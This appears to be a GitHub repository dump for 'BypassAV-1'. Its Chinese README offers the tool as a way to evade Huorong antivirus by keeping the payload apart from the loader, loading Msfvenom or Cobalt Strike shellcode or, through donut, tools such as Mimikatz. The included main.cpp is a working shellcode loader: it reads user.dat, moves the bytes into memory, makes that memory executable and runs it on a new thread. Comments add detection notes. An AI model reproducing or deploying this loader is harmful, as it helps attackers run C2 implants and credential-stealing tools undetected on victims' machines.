├── README.md
├── img1.png
└── main.cpp

/README.md:
--------------------------------------------------------------------------------
> 免责声明:本工具仅用于安全研究和教学目的,用户应自行承担因使用该工具而引起的一切法律和相关责任。作者不对任何法律责任承担责任。


# BypassAV-1
通过分离的方式免杀火绒

读入 Msfvenom 或 Cobalt Strike 等 C2 的 Shellcode 方式分离免杀

或者配合 donut 可以将 exe、dll 转为 Shellcode 载入 MimiKatz 等工具

# 效果
![Preview](https://github.com/yutianqaq/BypassAV-1/blob/main/img1.png)

--------------------------------------------------------------------------------
/img1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yutianqaq/BypassAV-1/f1ce3d486a02355c503664b148c726a79b6418ae/img1.png
--------------------------------------------------------------------------------
/main.cpp:
--------------------------------------------------------------------------------
#include  // header name stripped during extraction; the calls below need the Win32 API header
#include  // header name stripped during extraction; the calls below need the C stdio header

// Reads a sidecar file ("user.dat") into memory and runs its bytes as code on a
// new thread. The payload is not embedded in the executable, which is the
// "separation" the README describes: from a defender's view the loader binary on
// disk carries no payload, so detection has to rest on runtime behaviour (the
// memory-permission changes and thread start below) and on the presence of the
// companion data file, rather than on the loader's static content.
int main() {

    FILE* fp;
    SIZE_T size;
    unsigned char* buf;

    void* exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Stage 1: read the whole payload file into a heap buffer.
    // Neither fopen nor malloc results are checked; if user.dat is absent the
    // process faults at fseek, before any executable memory is ever created.
    // The co-located user.dat is itself a forensic artefact worth collecting.
    fp = fopen("user.dat", "rb");
    fseek(fp, 0, SEEK_END);
    size = ftell(fp);                 // payload length is taken from the file size
    fseek(fp, 0, SEEK_SET);
    buf = (unsigned char*)malloc(size);  // plain read/write staging copy on the heap

    fread(buf, size, 1, fp);          // return value is ignored; a short read leaves trailing bytes uninitialised

    // Stage 2: reserve and commit private (non-image-backed) memory, initially
    // mapped read/write only.
    exec_mem = VirtualAlloc(0, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Stage 3: copy the payload into the fresh region (RtlMoveMemory has
    // memmove semantics).
    RtlMoveMemory(exec_mem, buf, size);

    // Stage 4: flip the region from RW to RX. A private region that transitions
    // to executable and is then used as a thread start address is the classic
    // sequence that memory scanners and kernel/ETW thread-creation telemetry key
    // on, regardless of where the bytes came from.
    rv = VirtualProtect(exec_mem, size, PAGE_EXECUTE_READ, &oldprotect);

    if (rv != 0) {
        // Stage 5: run the payload as a thread entry point and block until it
        // returns. -1 converted to DWORD is 0xFFFFFFFF, i.e. INFINITE, so the
        // loader process stays alive for as long as the payload thread does.
        // A thread whose start address lies outside any loaded module is a
        // strong indicator on its own.
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);
    }
    return 0;
}
--------------------------------------------------------------------------------